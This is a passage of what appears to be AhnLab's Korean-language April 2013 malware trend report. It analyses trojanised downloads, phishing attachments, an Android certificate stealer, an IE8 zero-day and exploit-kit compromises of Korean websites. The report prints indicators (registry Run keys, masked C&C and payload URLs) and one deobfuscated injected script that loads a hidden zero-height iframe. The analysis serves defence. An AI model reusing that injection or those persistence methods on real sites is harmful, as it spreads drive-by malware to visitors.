1-53] 과같이특정서버로사용시스템의 MAN 정보, OS 정보, 백신프로그램의정보가체크되는것이확인됐다. 최근온라인게임핵에서자주등장하는 ws2help.dll 정상파일바꿔치기와백신프로그램을무력화하는기능은동일하게나타났다. 이글을작성하는시점에해당블로그에링크된 V3 Lite 설치파일을다운로드해설치할경우여전히다수의 PUP 프로그램들이설치되지만, 온라인게임핵을설치하는 wuu_utiltop.exe 파일은변경되어설치를진행해도더이상의온라인게임핵은자동으로설치되지않았다. 하지만지금이시점에도온라인게임핵을배포하는해당웹사이트는여전히운영되고있으며해당경로를통해다운로드가가능하다. 이와같은피해사례를사전에예방하기위해서는정상적인프로그램이나툴들은해당프로그램제작사홈페이지나공식적인다운로드사이트를통해서내려받는것이좋고, 블로그를통해다운로드받은파일들은공신력있는백신프로그램을이용해사전에검사를진행한후사용하는것이안전하다. 그림 1-51 V3 Lite 와함께설치되는 PUP 프로그램 이중 윈도우유틸리티업데이트 (wuu_utiltop.exe) 가온라인게임핵을다운로드한후실행된다. 여기서 PUP 프로그램이란, 불필요한프로그램 (PUP : Potentially Unwanted Program) 으로사용자가설치에동의했지만프로그램의실제내용이설치목적과관련이없거나불필요한프로그램으로시스템에문제를일으키거나사용자에게불편을초래할잠재적위험이있다. 안랩은허위사실이나과장된결과로수익을얻는경우나프로그램제작사또는배포지가불분명한경우등대다수사용자가불편을호소한프로그램을 PUP 프로그램으로진단하며, 사용자의동의하에 PUP 프
17 로그램을검사하고사용자가선택적으로삭제또는허용할수있도록하고있다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-PUP/Downloader.UtilTop.1895824 Trojan/Win32.OnlineGameHack Trojan/Win32.Scar Spyware/Win32.Agent 그림 1-56 C&C 서버에연결된시스템 인기게임에숨어든 좀비 PC 만드는악성코드 인기게임 심시티 를불법으로즐길수있는크랙 (crack) 파일로위장한악성코드가발견됐다. 해당악성코드는 토렌트 를통해국내외의불법파일공유사이트를통해유포중이며, 인기게임을공짜로즐기기위해불법다운로드하는유저를대상으로하여빠르게확산하고있다. 그림 1-57 일본에위치한 C&C 서버 그림 1-58 C&C 서버와통신중인다른좀비 PC V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-Trojan/Ircbot.108032 (2013.04.04.01) 그림 1-54 한창인기몰이중인 심시티 신작게임악성코드는 SimCityCrake.exe 와 mscsvc.dll 2개의파일로구성되어있다. Simcitycrake.exe를실행하면 mscsvc.dll 파일을 windows 폴더에 mssyssrv.exe로복사한뒤, [ 그림 1-55] 와같이 Microsoft Windows System Service 란이름으로서비스에등록해좀비PC로만든다. 구인정보메일에숨어유포된악성코드최근국내 OO신문사인사관리부장이헤드헌팅을통해연락을한다는내용의 IT직구인메일에악성코드가첨부돼유포된사례가보고됐다. 메일본문에는더좋은작업환경과대우를해준다면서구체적인대우및관련사항은첨부파일을열람하도록유도했다. 호기심을유발하는사회공학적기법을이용한전형적인사례다. 메일수신인또한국내신문사메일주소였다. 해당악성코드는APT 공격을위한것으로, 메일의본문내용은 [ 그림 1-59] 와같다. 그림 1-55 서비스에등록된악성코드 서비스에등록된프로세스는일본에위치한 IRC로구성된 C&C서버에접속후, 지속적으로명령을전달받는다. [ 그림 1-56] 과같이다수의좀비PC들이이미서버에연결중인것으로확인된다. 그림 1-59 수신된메일의내용
18 아래 [ 그림 1-60] 과같이메일원본의헤더정보를보면발신지 IP(KR) 를확인할수있다. 해당 IP는 TCP 25번포트가오픈돼있었고, 릴레이가허용되어있지않아외부에서메일을발송할수없었다. 대신해당 IP로웹브라우징하면 [ 그림 1-61] 과같이국내학회사이트로접속이되는것을확인할수있는데, 악성코드유포메일이발송된것을보면해당서버가해킹돼 APT 공격에악용된것으로판단된다. - %Temp%\ope1.tmp.bat - %Systemroot%\system32\Microsoft\WindowsUpdate.dll - %Systemroot%\system32\Microsoft\WindowsUpdate.reg - %ALLUSERPROFILE%\DebugLog.log - %ALLUSERPROFILE%\789a2558.dat [ 레지스트리등록 ] - HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run\WindowsUpdate "%Systemroot%\system32\Microsoft\WindowsUpdate.dll" 그림 1-60 메일원본헤더 그림 1-63 파일구성도 ope1.tmp.bat 파일은 **** 모집내용및상관대우.hwp[ 생략 ].exe 파일을삭제하는배치파일이고, WindowsUpdate.reg 파일은 WindowsUpdate.dll 파일을레지스트리에등록하기위한파일이다. 그림 1-61 메일발송 IP 로웹브라우징 메일에첨부된파일을압축해제하면아래와같이 HWP 문서를가장한실행파일을확인할수있다. DebugLog.log 파일은확인되지않는 MD5값과 C&C 서버로보이는호스트이름, 포트정보등이담겨있고 789a2558.dat 파일은 0바이트파일로 DebugLog.log 파일에포함돼있는 MD5값의앞여덟자리로파일이름이구성돼있다. 그림 1-64 DebugLog.log 파일내용 그림 1-62 압축해제된첨부파일 해당파일을실행하면아래와같은파일이생성되고시스템시작시자동으로실행되도록레지스트리에등록된다. 악성코드감염시실행되는 **** 모집내용및상관대우.hwp 파일은정상파일이며, [ 그림 1-65] 와같이신문광고공개입찰내용과광고금액이들어있다. [ 파일생성 ] - %Temp%\WINWORD.exe - %Temp%\**** 모집내용및상관대우.hwp
19 첨부된파일은아래그림과같이 PDF 아이콘의모습을하고있지만, exe 확장자를가진실행파일이며등록정보에서보면알수없는문자열로이루어져있는항목들로정상파일이아님을짐작할수있다. 그림 1-65 **** 모집내용및상관대우.hwp 파일내용 그림 1-67 첨부된악성파일 WindowsUpdate.dll 파일은 rundll32.exe 프로세스에로드되어동작하며, 아래 C&C 서버로접속한다. - by13.****news.com:443 C&C 서버로부터명령하달시시스템정보및키로깅정보를유출할것으로추정되며, C&C 서버에해당되는도메인은홍콩에서등록된도메인이지만, 해당도메인의 IP는국내 IP로확인된다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-Trojan/Dropper.199680 (2013.04.05.05) Trojan/Win32.Agent (2013.04.06.00) Win-Trojan/Agent.197376 (2013.04.05.05) 세계적인물류업체 DHL로위장한스팸메일대중에게잘알려진기업 ( 은행, 택배회사, 통신사및카드사등 ) 으로위장해안내메일인양악성코드를첨부한스팸메일을유포하는사례는하루이틀된이야기가아니다. 최근에도세계적인물류센터인 DHL로위장한악성코드첨부스팸메일이유포된바있어사용자의주의가요구된다. 해당메일은 DHL DELIVERY REPORT 라는제목으로쓰여있으며, 가까운우체국에서소포를찾아가라는내용과함께첨부된파일을실행하도록유도하고있다. 그림 1-68 첨부된악성파일등록정보해당메일에첨부된악성파일을실행하면생성되는파일은아래와같다. DHL-LABEL-ID-24 CREATE C:\Documents and Settings\All 생성된 svchost.exe 파일은윈도우기본방화벽을우회하기위해 svchost.exe 파일을예외처리하며이로인해방화벽이설정된시스템이라면아래와같이보안경고안내창을확인할수있다. 그림 1-66 DHL 위장스팸메일전문 그림 1-69 방화벽경고알림창
20 네트워크연결정보를보면예외처리된 svchost.exe 파일은백도어로서특정포트 (8000) 를 LISTENING 상태로열어둔것을확인할수있다. 그림 1-72 메일에첨부된악성파일 사용자의폴더옵션이알려진확장자에대한숨김설정이돼있는경우라면위와같이확장자가보이지않아사용자는 PDF 문서로판단하고파일을실행, 악성코드에감염될수있다. 파일을열어보면, 아래와같이윈도우실행파일 (PE) 형태인것을확인할수있다. 그림 1-70 악성 svchost.exe 네트워크정보국제운송업체, 은행등으로위장해악성코드를유포하는스팸메일은예전부터지속적으로발생하고있고, 현재에도주요보안위협으로악용돼피해사례역시꾸준히발생하고있다. 이에발신인이명확하지않거나, 첨부파일이포함된메일에대해서는확인시각별한주의가필요하다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Trojan/Win32.Agent (2013.04.23.05) HSBC 은행위장스팸메일 HSBC은행으로위장, 메일에악성파일을첨부해유포한사례가발견됐다. 기존스팸메일과유포형태는크게다르지않지만, 해당 HSBC 은행은국내에도다수의지점이운영되고있다는점에서감염피해가발생될수있어해당내용을전하고자한다. 메일제목은 Payment Advice - Advice Ref: [B7734899] 이다. 수신된메일의본문은 [ 그림 1-71] 과같이첨부된 e-advice 내용을참고하라고쓰여있다. 그림 1-73 파일내부확인파일이실행되어악성코드에감염되면추가로아래의파일이다운로드돼생성된다. [ 파일생성 ] - %TEMP%\624765.exe - %AppData%\Ciria\izdoes.exe - %TEMP%\637046.exe - %TEMP%\659875.exe - %TEMP%\682343.exe 또한, 시스템재시작시에도동작할수있도록아래의값을레지스트리에등록한다. [ 레지스트리등록 ] - HKCU\Software\Microsoft\Windows\CurrentVersion\ Run\{1593167F-6E50-AD40-5B87-53325B9F7020} "C:\Documents and Settings\Administrator\Application Data\Ciria\izdoes.exe" 감염시아래의경로로접속을시도한다. - 64.34.***.***:8080/pon***/gate.php - 94.32.***.***/pon***/gate.php - 116.122.***.***:8080/pon***/gate.php - hepcsupport.net/pon***/gate.php 그리고아래의경로를통해추가적인악성파일을다운로드하고, 실행한다. 그림 1-71 수신된메일의내용 첨부된파일은아래와같으며, PDF 문서의아이콘을가지고있다. - www.300******websites.com/****cehb.exe - 1787****.sites.****registeredsite.com/***AeL.exe - heermeyer-i*********.de/**u4.exe - 15******.webhosting*****.de/**2LLnfS.exe
21 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Trojan/Win32.Tepfer (2013.04.09.05) 출장보고서문서파일로위장한악성코드문서파일로위장해사용자PC를교묘히감염시키는수법이최근부쩍늘고있다. 이번에발견된악성코드는아래와같이워싱톤출장결과보고서.exe 라는파일명으로 MS워드문서파일형식의아이콘을그대로사용하고있어사용자가문서파일로혼동하고실행하도록유도하고있다. 그림 1-77 중국서버에주기적으로접속시도 V3 제품에서는아래와같이진단이가능하다. 그림 1-74 문서파일로위장한악성코드 악성코드는 RAR 실행압축파일로제작돼있으며, 해당파일을실행하면 1.doc 문서파일과 g1.exe,mspool.dll 실행파일을드롭한다. 이후 1.doc 문서를열고 g1.exe 파일을실행시키는데, 이때문서파일은손상돼있어 MS워드에서제대로열리지않는다. 그림 1-78 네트워크연결정보 그림 1-75 doc 문서열기실패메시지이후악성코드는 mspool.dll 파일을 Windows mspool service. 라는이름의윈도우서비스로등록하고주기적으로동작시킨다. <V3 제품군의진단명 > Win-Trojan/Agent.218061 (2013.04.10.03) Win-Trojan/Agent.131585 (2013.03.14.05) Backdoor/Win32.Etso (2013.04.02.01) 메일에첨부된악성 HWP 국내특정기관및산업체에서악성 HWP 파일이첨부된메일이수신됐다. 관련파일들은수집됐으나, 메일의원문은확인되지않았다. 그림 1-76 등록된악성서비스 등록된악성서비스는아래의중국에위치한서버에주기적으로접속을시도하나분석당시해당서버는접근이불가능했다. 첨부파일은 ' 협력확대방안.hwp', ' 제안서.hwp', ' 대응방안.hwp' 파일명으로확인되며, 관련정보를다루는기관및업체를통해 APT를목적으로유포한것으로보인다. 취약점이존재하는관련문서편집프로그램버전에서해당파일을열면, [ 그림 1-79] 와같이정상적인문서파일실행으로위장하기위해관련문서가실행된다.
22 또한아래의특정서버로수집된시스템정보를전송하는것으로추정된다. 그림 1-82 특정서버로의접속정보 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > HWP/Exploit (2013.04.22.03) Trojan/Win32.Agent (2013.04.24.02) 그림 1-79 실행되는정상 HWP 문서 다만, 해당문서가실행됨과동시에사용자모르게악성파일이생성및실행되어, 악성코드에감염된다. 감염시생성되는파일은아래와같으며, 정상문서출력을위한한글문서파일 (tmp.hwp) 과악성파일 (msupdate.exe) 이생성된다. [ 파일생성 ] %TEMP%\tmp.hwp ( 정상파일 ) %TEMP%\msupdate.exe ( 악성 ) 그리고아래와같이서비스에등록되어시스템재시작이후부터악의적인행위를수행하며, 서비스명은윈도우정상서비스인것처럼위장해등록된다. 03 악성코드동향 모바일악성코드이슈 스마트폰사용자의공인인증서를탈취하는악성앱발견 그림 1-80 레지스트리에등록된서비스정보생성된악성파일 (msupdate.exe) 이실행되면 net.exe, net1.exe, ipconfig.exe, tasklist.exe, systeminfo.exe 등의프로세스를통해 OS, 계정, 네트워크, 프로세스, 설치된프로그램등의시스템에대한각종정보를수집한다. 최근금전적이득을목적으로안드로이드기반의스마트폰사용자에게문자메시지를발송해수신된메시지에첨부된링크를접속하도록하는형태의악성앱이끊임없이유포되고있다. 기존에발견된악성앱은소액결제인증번호를가로채는악성코드였지만, 이번에발견된악성앱 (SmsProtect) 은스마트폰에설치된공인인증서와문자메시지를탈취한다. 스미싱문자는할인쿠폰, 공짜쿠폰, 영화할인권, 소액결제문자등으로위장해유포되고있다. 그림 1-81 악성코드에의해수집된시스템정보 그림 1-83 다양한형태로유포되고있는스미싱문자
23 [ 그림 1-84] 는스미싱문자를통해유포된악성앱 (SmsProtect) 의설치화면이다. 해당앱은 SMS 읽기, 네트워크통신, 내장메모리를접근하는권한을사용한다. 해당정보가전송되는서버의 IP 주소와계정정보는디컴파일된코드에서확인할수있다. 그림 1-84 공인인증서를탈취하는안드로이드악성앱설치화면 악성앱을실행하면정상적으로실행되지않고종료되지만, 스마트폰번호와감염시간정보를특정서버 (110.**.***.91) 에전송한다. 그림 1-88 SSH 연결정보악성코드제작자는스마트폰에서탈취한공인인증서와보안카드를이용해사용자에게금전적피해를일으킬수있다. 스마트폰사용자들은피해가발생하지않도록각별히주의해야한다. V3 Mobile 제품에서는아래와같이진단이가능하다. 그림 1-85 네트워크연결정보연결을시도하는서버주소는악성앱 (APK) 내부 assets 폴더의 url.txt 파일에설정되어있으며, 해당폴더에는 mobile.txt, path.txt, prefix.txt 파일도함께존재한다. <V3 제품군의진단명 > Android-Trojan/SMSstealer 그림 1-86 assets 폴더에존재하는 txt 파일악성앱은스마트폰와이파이를활성화하고시큐어셸 (SSH) 을이용해서특정서버 (174.***.**.50) 에연결한다. 이후스마트폰에서수집한공인인증서와메모파일을사진파일과함께서버로전송한다. 그림 1-87 공인인증서, 메모, 사진탈취기능
SECURITY TREND 24 01 보안동향 보안통계 4 월마이크로소프트보안업데이트현황 05 06 07 08 09 10 11 12 01 02 03 04 2013 년 4 월마이크로소프트사에서발표한보안업데이트는총 9 건 으로긴급 2 건, 중요 7 건이다. Windows 시스템의취약점과관련된업 데이트가가장높은비중을차지했으며, 비공개취약점두건에대한 Internet Explorer 누적보안업데이트도발표됐다. 현재까지해당취약 점을악용한공격사례는발견되지않았으나, 추후악용될가능성이존 재하므로최신보안업데이트의적용이필요하다. 긴급 MS13-028 Internet Explorer 누적보안업데이트 MS13-029 RDP 클라이언트의취약점으로인한원격코드실행취약점 중요 MS13-030 SharePoint 서버의취약점으로인한정보노출취약점 MS13-031 Windows 커널취약점으로인한권한상승취약점 MS13-032 Active Directory 취약점으로인한서비스거부취약점 MS13-033 Windows CSRSS 취약점으로인한권한상승취약점 MS13-034 Windows Defender 취약점으로인한권한상승취약점 MS13-035 HTML 구성요소의취약점으로인한권한상승취약점 MS13-036 커널모드드라이버취약점으로인한권한상승취약점 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 5 4 3 2 1 0 표 2-1 2013 년 04 월주요 MS 보안업데이트 그림 2-1 공격대상기준별 MS 보안업데이트
SECURITY TREND 25 02 보안동향 보안이슈 Internet Explorer 제로데이취약점 (CVE-2013-1347) 마이크로소프트에서는 Internet Explorer8(IE8) 에서 CVE-2013-1347 취약점을악용하는제로데이취약점이발견됐다고발표했다. 영향을받는운영체제는 IE8이설치될수있는모든운영체제로 Windows XP( 서비스팩 3), Windows Vista, Windows Server 2003, Windows 7, Windows Server 2008 등널리사용되는운영체제버전들이모두영향을받을수있기때문에 IE8을사용하는사용자들은각별한주의가필요하다. 본취약점은공격자가악의적으로특수하게조작한웹페이지에 IE8을통해접속할경우, 메모리처리오류가발생하면서원격코드수행이가능하다. 메모리처리 IE에서사용하는모듈인 mshtml.dll 내부에서발생하며, 이미삭제되었거나올바르게할당되지않은객체에대한접근을시도하면서발생한다. 이로인해현재사용자의권한으로공격자가원하는코드를실행할수있게된다. 이미해외에서해당취약점을악용한실제공격사례도발견됐으며, 취약점테스트도구인 Metasploit을통해서도본취약점과관련해테스트를수행할수있는스크립트가공개되어있다. 그림 2-3 Metasploit에서공개한 IE8 제로데이공격스크립트일부본취약점은 TrusGuard 제품군에서다음과같이탐지및차단하고있다. - ms_ie_cgeneric_object_exploit-1(cve-2013-1347) - ms_ie_cgeneric_object_exploit-2(cve-2013-1347) - javascript_malicious_drive-1(http) 사용자 PC 를제어하는악성원격관리프로그램주의 그림 2-2 Metasploit을통한 IE8 제로데이공격테스트화면현재마이크로소프트에서본취약점을대상으로하는 Fix It 패치를제공하고있으며, Fix It 패치는다음위치에서확인할수있다 (http:// support.microsoft.com/kb/2847140). 추후 Fix It 패치외에도정식보안패치가제공될것으로보이며, 정식보안패치가제공되기전까지는 IE에서스크립트실행기능을제한하고, 구글크롬 (Google Chrome) 이나모질라 (Mozilla), 파이어폭스 (Firefox) 등다른웹브라우저를사용하거나 (Windows XP의경우 ) IE9 또는 10 버전으로업그레이드 (Windows Vista 또는 Windows 7의경우 ) 해여해당취약점으로부터시스템을보호할수있다. 원격관리프로그램 (Remote Administration Tool, 이하 RAT 프로그램 ) 이란본래소수의관리자가원격에서다수의컴퓨터를손쉽게제어하기위해사용되는도구로, 원격컴퓨터의화면을감시또는제어하거나, 파일을관리하고, 관리용셸명령을입력하는등의편리한기능을제공하는도구다. 이처럼원격컴퓨터에대한정보를모두획득하고제어할수있는 RAT 프로그램의강력한장점을악용해원격컴퓨터에악성코드를주입하거나, 사용자가입력하는정보를감시해가로채거나, 사용자의컴퓨터를공격자가제어해공격자대신특정대상에게공격을수행하도록명령하는악성 RAT 프로그램들이등장했다.
SECURITY TREND 26 악성 RAT 프로그램은그기능도강력하고종류도다양해매우위협적인프로그램이지만, 대다수의악성 RAT 프로그램은안티바이러스소프트웨어를통해탐지및대응이가능하다. 그림 2-4 악성 RAT 프로그램제어화면의예 악성 RAT 프로그램중널리알려진것으로는 Gh0st, Dark Comet, Poison Ivy 등이있으며이중 Gh0st의경우수많은변종이존재하는것으로유명하다. 이외에도다양한종류의악성 RAT 프로그램이존재하며그중에는원격컴퓨터에서 DDoS 공격을수행하도록하는기능이포함된것도존재한다. 악성 RAT 프로그램은최근위협이되고있는 APT 공격에도자주활용되고있다. 그림 2-5 DDoS 기능을포함하는악성 RAT 프로그램화면 악성 RAT 프로그램이사용자의컴퓨터에서실행되면공격자가미리설정해둔서버로접속해공격자가해당컴퓨터를제어할수있는명령을수신하도록한다. 접속과정이나명령전달과정에서발생하는네트워크트래픽은평문으로전송되는경우도있으나, 자신만의방식으로암호화해서전송하는경우도존재한다. 대부분의악성 RAT 프로그램은시스템의레지스트리나서비스에자기자신을등록해컴퓨터가다시시작하더라도해당프로그램역시실행될수있도록하며, 다른시스템프로세스에인젝션하는등의방법으로존재를은폐하는경우가대부분이다. 공격자는배포하고자하는악성 RAT 프로그램이접속할주소, 은폐여부, 서비스등록여부등을원하는대로설정해제작할수있다. 그림 2-6 배포용악성 RAT 프로그램설정예시
WEB SECURITY TREND 27 01 웹보안동향 웹보안통계 웹사이트악성코드동향안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하면, 2013년 4월악성코드를배포하는웹사이트를차단한건수는모두 1만1821건이었다. 악성코드유형은총 301종, 악성코드가발견된도메인은 191개, 악성코드가발견된 URL은 654개로각각집계됐다. 전월과비교해서악성코드유형, 악성코드발견된 URL은다소감소했으나, 악성코드발견건수, 악성코드가발견된도메인은증가했다. 악성코드배포 URL 차단건수 7,861 11,821 03 04 +50.4% 악성코드유형악성코드가발견된도메인악성코드가발견된 URL Graph 328 181 783 328 301 191 181 301 191 654 783 654 표 3-1 2013 년 4 월웹사이트보안현황 월별악성코드배포 URL 차단건수 2013년 4월악성코드발견건수는전월 7861건과비교해 50% 수준증가한 1만1821건이다. 15,000 10,000 5,000 8,267 7.1% -406 7,861 4.9% +3,960 11,821 50.4% 0 02 03 04 그림 3-1 월별악성코드배포 URL 차단건수변화추이
WEB SECURITY TREND 28 월별악성코드유형 2013년 4월의악성코드유형은전월의 328건에비해 8% 감소한 301건이다. 500 250 333 5.7% 328 301 1.5% 8.2% -5-27 0 02 03 04 그림 3-2 월별악성코드유형수변화추이 월별악성코드가발견된도메인 2013년 4월악성코드가발견된도메인은 191건으로 2013년 3 월의 181건에비해 6% 증가했 400 300 200 271 36.1% -90 181 191 33.2% 5.2% +10 다. 100 0 02 03 04 그림 3-3 월별악성코드가발견된도메인수변화추이 월별악성코드가발견된 URL 2013년 4월악성코드가발견된 1,000 909 18.2% +91 783 13.9% -129 654 16.5% URL은전월의 783건과비교해 84% 수준인 654건이었다. 500 0 02 03 04 그림 3-4 월별악성코드가발견된 URL 수변화추이
WEB SECURITY TREND 29 악성코드유형별배포수악성코드유형별배포수를보면트로이목마가 5627건 (47.6%) 으로가장많았고, 애드웨어가 1508건 (12.8%) 인것으로조사됐다. 유형 건수 비율 TROJAN 5,627 47.6 % ADWARE 1,508 12.8 % DROPPER 330 2.8 % DOWNLOADER 265 2.2 % Win32/VIRUT 148 1.3 % SPYWARE 71 0.6 % JOKE 62 0.5 % APPCARE 15 0.1 % ETC 3,795 32.1 % TOTAL 11,821 100% 표 3-2 악성코드유형별배포수 TROJAN 5,627 ETC 3,795 5,000 ADWARE 1,508 DROPPER 330 2,500 DOWNLOADER 264 Win32/VIRUT 148 SPYWARE 71 JOKE 62 APPCARE 15 0 그림 3-5 악성코드유형별배포수 악성코드최다배포수악성코드배포최다 10건중에서 Trojan/Win32.KorAd이 842 건으로 1위를차지하였으며, TextImage/Viking 등 4건이새로등장하였다. 순위 등락 악성코드명 건수 비율 1 Trojan/Win32.KorAd 842 15.0 % 2 NEW TextImage/Viking 792 14.1 % 3 NEW Win-Trojan/Morix.406016.B 744 13.3 % 4 1 ALS/Qfas 531 9.5 % 5 1 ALS/Bursted 530 9.4 % 6 4 Adware/Win32.Clicker 499 8.9 % 7 3 Packed/Win32.Vmpbad 446 7.9 % 8 NEW Win-Trojan/Agent.544135 418 7.4 % 9 Trojan/Win32.HDC 416 7.4 % 10 NEW Adware/Win32.StartPage 396 7.1 % TOTAL 5,614 100 % 표 3-3 악성코드배포최다 10 건
WEB SECURITY TREND 30 02 웹보안동향 웹보안이슈 4월 1개월간악성코드유포목적으로해킹된사이트의특징을요약해보면아래와같다. 1 언론사사이트를통한악성코드유포 2 취업포털사이트를통한악성코드유포 그림 3-6 난독화된악성스크립트가삽입된배너페이지 언론사사이트를통한악성코드유포여기에언급된언론사사이트는한동안악성코드유포를하다가잠잠했으나 4월중순부터다시악성코드를유포한것이확인됐다. 그당시패킷로그를분석해보면, 최종적으로악성실행파일을다운로드하기위해우선 1차로해당언론사사이트의특정페이지에난독화된악성스크립트가삽입돼있었다. GET /********/****all.html HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://news.********.com/php/news_list.php?g_ menu=******* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: news.*********.com Connection: Keep-Alive ****all.html은 상단배너 라는문구를통해서난독화된악성스크립트가삽입된페이지가배너기능을담당하는페이지임을유출해볼수있으며, 해당배너페이지에는아래그림처럼정상스크립트링크뿐만아니라 Function형태로난독화된악성스크립트코드가존재함을알수있다. 그림 3-6] 을보면 Function형태로난독화된악성스크립트코드중간에빈공간이존재하는것처럼인식될수있으나이는사실눈속임을위한것으로스페이스키와탭키가조합되어암호화된코드영역이다 ( 참고로 16진수로스페이스키는 0x20, 탭키는 0x09를의미한다 ). 해당언론사사이트는예전에도위 [ 그림 3-6] 처럼특정배너페이지에유사한형식을통해서난독화된악성스크립트가삽입됐고, 그를통해최종적으로악성코드가다운로드된바있다. document.write(unescape("%3ciframe%20src%3dhttp%3a%2f% 2Fwww%2E******%2Ecom%2Fkcp%2Fbin%2FTop%2Ehtml%20 width%3d100%20height%3d0%3e%3c%2fiframe%3e")); <iframe src=http://www.******.com/kcp/bin/top.html width=100 height=0></iframe> [ 그림 3-6] 에삽입된난독화된악성스크립트를분석해보면위코드처럼 Top.html을다운로드하는 iframe 태그였음을알수있다. 그림 3-7 공다익스플로이트킷으로된 Top.html
WEB SECURITY TREND 31 위 [ 그림 3-8] 은 Top.html의내부코드중일부이며, 국내해킹된웹사이트들에서흔히볼수있는공사익스플로이트킷 (Gongda Exploit Kit) 으로제작및난독화된악성스크립트다. Top.html 역시분석해보면다중취약점 (Java, Internet Explorer, Flash Player 등에존재 ) 을사용해최종실행가능한형태의악성코드인 60.exe를다운로드하도록돼있다. 위패킷로그를기반으로악성코드유포경로를추적해보면다음과같다. http://www.**********.co.kr/default.asp( 취업포털사이트 ) http://www.****bridge.co.kr/pages/etc/**********_etc.php http://ijang.*****.com/twitter/oauth/****_proc.js 그림 3-8 Top.html에서사용하는자바취약점 (CVE-2011-3544) 60.exe는아래와같은기능을가지고있다. 특정사이트접속 (qkrxotjr6060.*****.net:6060) 키로깅기능을통해서감염된 PC의키보드입력내용을기록함파일다운로드프로세스강제종료 rasphone.pbk(device, PhoneNumber, DialParamsUID 정보탈취 ) http://ijang.*****.com/twitter/oauth/****_proc.js 실제악성스크립트가삽입된페이지는 ****_proc.js인데, 해당페이지는아래처럼난독화된악성스크립트코드를가지고있으며분석해보면최종적으로 http://205.***.146.***/img/index.html를다운로드하도록돼있다. 그림 3-9 ****_proc.js 에저장된난독화악성스크립트 취업포털사이트를통한악성코드유포악성코드를유포했던사이트들중상당수는해당사이트가취약해서악성코드를유포하는것이아니라, 외부에서불러와사용하는콘텐츠 ( 예를들면, 배너광고등 ) 가해킹돼악성코드를유포하는사례다. 4월에발견된취업포털사이트를통한악성코드유포도해당사이트가취약해해킹된것이아니라외부에서불러와링크했던페이지가해킹돼악성코드를유포한것이다. 이는마치취업포털사이트가해킹되어악성코드를유포한것으로인식될수있다. 그당시패킷로그를보면취업포털사이트는아래처럼외부사이트에서특정 php파일을불러옴을알수있다. GET /pages/etc/**********_etc.php HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.**********.co.kr/default.asp Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: www. **********bridge.co.kr Connection: Keep-Alive index.html 역시공다익스플로이트킷으로제작및난독화된악성스크립트로, 그형태는 (1) 언론사사이트를통한악성코드유포 에서살펴봤던 Top.html과동일하다. 그림 3-10 index.html에서사용하는자바취약점 (CVE-2013-0422) 해당취업포털사이트에접속했던 PC에자바가설치되어있고, [ 그림 3-10] 의취약점 (CVE-2013-0422) 이존재한다면 img.jpg파일을다운로드한후실행된다. 다운로드된 img.jpg는확장자만보면그림파일이므로단독으로실행했을경우그림판을통해서또는이미지를볼수있는프로그램을통해서 img.jpg파일의내용을보여주지만다운로드된해당파일은확장자만 jpg일뿐실제로는실행가능한 exe파일이다. img.jpg파일은아래와같은기능을가지고있다. 윈도우시스템파일교체백신기능무력화및프로세스강제종료특정온라인게임사용자의계정정보탈취
ASEC REPORT CONTRIBUTORS 집필진 선임연구원 안창용 선임연구원 이도현 주임연구원 문영조 주임연구원 김재홍 연구원 강민철 연구원 김혜선 대리 황선욱 참여연구원 ASEC 연구원 SiteGuard 연구원 편집 안랩세일즈마케팅팀 디자인 안랩 UX 디자인팀 감수전무조시행 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T. 031-722-8000 F. 031-722-8901 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. 2013 AhnLab, Inc. All rights reserved.